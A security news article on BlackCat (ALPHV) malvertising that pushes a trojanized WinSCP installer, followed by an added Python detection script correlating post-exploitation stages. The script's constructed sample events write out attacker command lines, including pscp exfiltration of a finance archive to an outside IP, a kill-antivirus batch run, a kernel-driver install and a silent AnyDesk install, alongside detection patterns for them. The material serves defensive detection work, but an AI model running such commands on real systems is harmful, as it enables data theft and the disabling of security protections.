BlackCat Deploys Malvertising for Backdoor Access

The BlackCat ransomware-as-a-service group, also known as ALPHV, is running a cluster of threat activity that hijacks specific search keywords so that its advertisements appear when people look for legitimate software. Visitors who click the malicious ads are sent to a counterfeit download page for WinSCP, a widely used open-source Windows application for transferring files between local computers and remote servers over protocols such as SFTP, SCP and FTP, and the page serves a trojanized installer in place of the real one.

Malvertising is the practice of spreading malware through online advertising; here it works by hijacking selected keywords so that fraudulent ads appear on Bing and Google search result pages and redirect unsuspecting users to attacker-controlled sites. It is closely related to SEO poisoning, which manipulates organic search rankings for the same purpose. Researchers from Trend Micro, working with an organization that has not been named, discovered the intrusion inside that organization's network. The criminals used a cloned webpage of WinSCP, an open-source Windows file-transfer application, together with the Terminator tool sold by SpyBoy, which disables the protection offered by endpoint security agents.

BlackCat Exploits Malvertising Techniques to Promote Backdoor Entry

According to BleepingComputer, the group targets system administrators, web administrators, and IT professionals, because their accounts provide initial access to valuable corporate networks. Trend Micro researchers Lucas Silva, RonJay Caragay, Arianne Dela Cruz, and Gabriel Cardoso described their work with a victim compromised through this campaign in a research report dated June 30.

The objective is to deceive users searching for applications like WinSCP into downloading malware, specifically a backdoor containing a Cobalt Strike Beacon. The backdoor connects to a remote command-and-control server for subsequent operations, and the operators also run legitimate tools such as AdFind for network discovery. As stated in the Trend Micro report, “Malware distributors exploit the same functionality in a technique known as malvertising – hijacking keywords to display malicious ads that lure unsuspecting search engine users into downloading malware.”

Malvertising Campaign by BlackCat: Spreading Backdoor Access

WinSCP is effective bait because it is open source and widely used: it transfers files securely over SSH, manages remote files, and can act as a WebDAV and Amazon S3 client, so many of the people searching for it are the administrators the group wants. The research report details the tactics, techniques, and procedures (TTPs) used during the attack, including both legitimate and malicious tools, scripts, and commands. In a separate investigation, the same TTPs were identified in an intrusion that ended in a BlackCat infection.

The access provided by Cobalt Strike is then used to download further tooling: PowerView for reconnaissance and Active Directory enumeration, PsExec for lateral movement, a KillAV batch script to disable antivirus software, and the PuTTY Secure Copy client (pscp) to exfiltrate the customer's data. The attackers obtained top-level administrator privileges and attempted to establish persistence and backdoor access to the customer's environment using remote management tools.

BlackCat Leveraging Malvertising for the Distribution of Backdoor Entry

The fraudulent advertisements were identified on Google and Bing search pages. Trend Micro, the first to report the campaign, noted that searches for “WinSCP Download” on both engines returned the malicious ads above the legitimate results. In the case Trend Micro investigated, the threat actor was removed from the victim's network, but not before gaining and misusing top-level administrator privileges, attempting to establish persistence, and implanting backdoor access with remote management tools such as AnyDesk. The Terminator defense evasion tool, which tampers with security software through a Bring Your Own Vulnerable Driver (BYOVD) attack, was also observed.
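The post-exploitation chain described in the two paragraphs above (AdFind and PowerView for discovery, PsExec for lateral movement, KillAV and Terminator for defense evasion, pscp for exfiltration, AnyDesk for persistence) is noisy at the process-creation layer. As an added example, not code from the article or from the Trend Micro report, the Python below tags Sysmon-style process events with the stage they suggest and raises an alert for any host where three or more distinct stages occur within a two-hour window. The event lines, hostnames and the 203.0.113.10 address are constructed for this illustration; the pattern table, including the AnyDesk --install flag and the sc create ... type= kernel form used to register a driver, is an assumption a SOC would tune, not a vendor detection.

```python
"""
Added example (not from the original article or the Trend Micro report):
tag process-creation events with the post-exploitation stage they suggest and
alert when several distinct stages appear on one host in a short window.
All events, hostnames and the 203.0.113.10 address are constructed; the
pattern table is an assumption a SOC would tune, not a vendor detection.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Each regex runs over "image cmdline parent=<parent image>" (case-insensitive).
STAGE_PATTERNS = {
    # AdFind, or PowerView-style cmdlets launched through PowerShell
    "discovery": re.compile(r"\badfind\.exe\b|get-net(user|computer|domain)|\bpowerview\b", re.I),
    # PsExec client on the source host, or a child of PSEXESVC on the target
    "lateral_movement": re.compile(r"\bpsexe(c|svc)\.exe\b", re.I),
    # KillAV batch file, or a kernel driver registered via sc (BYOVD loaders
    # commonly install the vulnerable driver as a kernel service; assumption)
    "defense_evasion": re.compile(r"\bkillav\S*\.bat\b|\bsc(\.exe)?\s+create\s+\S+.*type=\s*kernel", re.I),
    # AnyDesk unattended install (--install is AnyDesk's CLI flag; assumption)
    "persistence": re.compile(r"\banydesk\S*\.exe\b.*--install", re.I),
    # pscp pushing a local file to user@<IPv4>:path
    "exfiltration": re.compile(r"\bpscp\.exe\b.*\s\S+@\d{1,3}(?:\.\d{1,3}){3}:", re.I),
}


def tag_event(image, cmdline, parent):
    """Return the stages whose pattern matches this process event."""
    text = f"{image} {cmdline} parent={parent}"
    return [stage for stage, rx in STAGE_PATTERNS.items() if rx.search(text)]


def stage_summary(events):
    """Distinct stages seen per host (hosts with no tagged events are omitted)."""
    seen = defaultdict(set)
    for _, host, image, cmdline, parent in events:
        seen[host].update(tag_event(image, cmdline, parent))
    return {host: sorted(stages) for host, stages in seen.items() if stages}


def correlate(events, window_minutes=120, min_stages=3):
    """Alert on hosts where >= min_stages distinct stages occur within the
    window. Returns {host: sorted stages of the first window that qualifies}."""
    window = timedelta(minutes=window_minutes)
    hits = defaultdict(list)
    for ts, host, image, cmdline, parent in events:
        t = datetime.fromisoformat(ts)
        for stage in tag_event(image, cmdline, parent):
            hits[host].append((t, stage))
    alerts = {}
    for host, items in hits.items():
        items.sort()
        for i, (t0, _) in enumerate(items):
            stages = {s for t, s in items[i:] if t - t0 <= window}
            if len(stages) >= min_stages:
                alerts[host] = sorted(stages)
                break
    return alerts


# Constructed sample events: (utc time, host, image, command line, parent image)
SAMPLE_EVENTS = [
    ("2023-06-20T09:01:10", "WS-042", r"C:\Users\jdoe\Downloads\WinSCP-Setup.exe", "WinSCP-Setup.exe", "explorer.exe"),
    ("2023-06-20T09:03:42", "WS-042", r"C:\Windows\Temp\adfind.exe", "adfind.exe -f objectcategory=computer", "cmd.exe"),
    ("2023-06-20T09:05:05", "WS-042", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -ep bypass -c Get-NetUser -Domain corp.example", "cmd.exe"),
    ("2023-06-20T09:20:30", "WS-042", r"C:\Windows\Temp\psexec.exe", r"psexec.exe \\FS-01 -s cmd.exe", "cmd.exe"),
    ("2023-06-20T09:31:12", "FS-01", r"C:\Windows\System32\cmd.exe", r"cmd.exe /c C:\Temp\killav.bat", "PSEXESVC.exe"),
    ("2023-06-20T09:33:01", "FS-01", r"C:\Windows\System32\sc.exe",
     r"sc create drv1 type= kernel binPath= C:\Windows\Temp\drv1.sys", "cmd.exe"),
    ("2023-06-20T09:40:50", "FS-01", r"C:\Users\Public\AnyDesk.exe",
     r"AnyDesk.exe --install C:\ProgramData\AnyDesk --silent", "cmd.exe"),
    ("2023-06-20T10:02:17", "FS-01", r"C:\Users\Public\pscp.exe",
     r"pscp.exe -pw x C:\Shares\finance.7z u@203.0.113.10:/in/", "cmd.exe"),
    # benign interactive AnyDesk use on another host: no --install, no tag
    ("2023-06-20T11:15:00", "WS-007", r"C:\Program Files\AnyDesk\AnyDesk.exe", "AnyDesk.exe", "explorer.exe"),
]

if __name__ == "__main__":
    print("stages per host:", stage_summary(SAMPLE_EVENTS))
    print("alerts:", correlate(SAMPLE_EVENTS))
```

On the constructed data the file server FS-01 crosses the threshold (lateral movement, defense evasion, persistence and exfiltration inside half an hour) while the initial workstation WS-042 shows only discovery and lateral movement; correlating per host deliberately keeps the rule simple, and a real deployment would also join the PsExec client event on WS-042 to the PSEXESVC child on FS-01 so that the whole chain surfaces as one incident.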
